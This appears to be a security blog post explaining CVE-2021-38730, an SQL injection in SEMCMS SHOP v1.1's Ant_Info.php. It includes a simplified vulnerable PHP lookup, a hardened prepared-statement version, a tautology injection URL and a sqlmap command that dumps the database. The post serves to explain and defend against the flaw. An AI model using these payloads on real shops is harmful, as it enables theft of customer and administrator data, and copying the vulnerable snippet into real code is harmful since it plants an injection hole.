Cybersecurity vulnerabilities can have a significant impact on e-commerce systems. One such critical issue is CVE-2021-38730 — an SQL Injection in SEMCMS SHOP version 1.1, specifically in the Ant_Info.php script. In this post, we’ll break down the vulnerability, show a basic exploit, and offer steps to protect your site. We’ll use simple language so anyone managing SEMCMS SHOP can understand the risk and act accordingly.
What Is SEMCMS SHOP v1.1?
SEMCMS SHOP is a PHP-based open source e-commerce platform. Like many online shop systems, it handles tons of critical customer data, inventory, and orders — making it a target for attackers.
What Does CVE-2021-38730 Involve?
This vulnerability allows an attacker to execute malicious SQL statements on the backend database by injecting unsanitized user input into SQL queries. Attackers can steal information like user details, admin credentials, and even make unauthorized changes in the database.
Where’s the Problem? The Ant_Info.php File
In version 1.1, SEMCMS SHOP handles certain information requests via Ant_Info.php. When fetching details about a specific “ant” (which could be a product, user, or any entity managed in the system), the PHP script constructs SQL queries using GET parameters without proper input validation.
Here’s a simplified version of the offending code inside Ant_Info.php:

```php
<?php
include("config.php");           // sets up the database connection in $db
$id = $_GET['id'];               // raw, untrusted query-string value
// The value is concatenated straight into the SQL text (the vulnerable pattern)
$sql = "SELECT * FROM ants WHERE id = '$id'";
$result = mysqli_query($db, $sql);
$row = mysqli_fetch_assoc($result);
echo $row['name'];
?>
```
_What’s the problem?_
The $id variable is taken straight from the request’s query string and concatenated into the SQL text with no validation, escaping, or parameter binding. Whatever the attacker puts in `id` is parsed by the database as part of the query, so they can inject their own SQL.
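For comparison, here is a hardened version of the same lookup. This is an added example written for this post, not SEMCMS SHOP’s own code or its actual patch. It assumes, like the simplified snippet above, that config.php creates a mysqli connection in `$db` and that the table and column are called `ants` and `name`; the function name `fetch_ant_name` is this example’s own.

```php
<?php
// Added example (not SEMCMS SHOP's own code): hardened form of the
// simplified Ant_Info.php lookup. Assumes config.php provides a mysqli
// connection in $db, and a table `ants` with an integer `id` and a `name`.
declare(strict_types=1);

include("config.php");

// Turn MySQL errors into exceptions instead of silently returning false.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/**
 * Look up an ant record by id using a prepared statement.
 * Returns the name, or null if the id is malformed or no row matches.
 */
function fetch_ant_name(mysqli $db, $rawId): ?string
{
    // The id is numeric, so accept only a positive integer and fail closed on
    // anything else (an array, an empty string, "1' OR '1'='1", ...).
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // The bound value is sent to the server separately from the SQL text,
    // so it can never be interpreted as part of the query.
    $stmt = $db->prepare("SELECT name FROM ants WHERE id = ?");
    $stmt->bind_param("i", $id);
    $stmt->execute();
    $stmt->bind_result($name);
    $found = $stmt->fetch();
    $stmt->close();

    return $found ? $name : null;
}

$name = fetch_ant_name($db, $_GET['id'] ?? '');
if ($name === null) {
    http_response_code(404);
    exit('Not found');
}
// Escape on output so the lookup does not become an HTML injection sink.
echo htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
```

The two changes that matter are the integer validation, which rejects any value that is not a plain positive number before it reaches the database, and the prepared statement, which keeps the value out of the SQL text entirely. Either one alone would stop this particular injection; together they fail closed even if a later change to the query introduces a non-numeric parameter.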
How Attackers Exploit CVE-2021-38730
Let’s see how this vulnerability can be exploited.

A normal request:

```
http://yourshop.com/Ant_Info.php?id=1
```

The same request with an injected payload:

```
http://yourshop.com/Ant_Info.php?id=1' OR '1'='1
```
Blind SQLi for Data Extraction:
Attackers can use complex SQLi payloads for extracting admin passwords, emails, or even database schema — employing tools like sqlmap.
Example: Dumping Database with sqlmap

```
sqlmap -u "http://yourshop.com/Ant_Info.php?id=1" --dump
```
Beyond reading data, an attacker can also corrupt the shop’s database.
These attacks are especially critical for small and mid-sized shops, which often lack advanced cybersecurity resources.
References & Further Reading
- CVE-2021-38730 at NVD (National Vulnerability Database)
- SEMCMS SHOP Project
- OWASP SQL Injection Cheat Sheet
- sqlmap Automated SQL Injection Tool
Conclusion
CVE-2021-38730 in SEMCMS SHOP v1.1 is a real-world, high-impact SQL injection flaw that could shut down your business — or worse, compromise your customers.
If you’re running SEMCMS SHOP (or any similar PHP shopping cart), act now: update, patch, and secure your code before hackers find you.
If you found this writeup useful, share it with your team or peers. Let’s keep e-commerce safe for everyone!
Timeline
Published on: 10/28/2022 16:15:00 UTC
Last modified on: 10/28/2022 18:47:00 UTC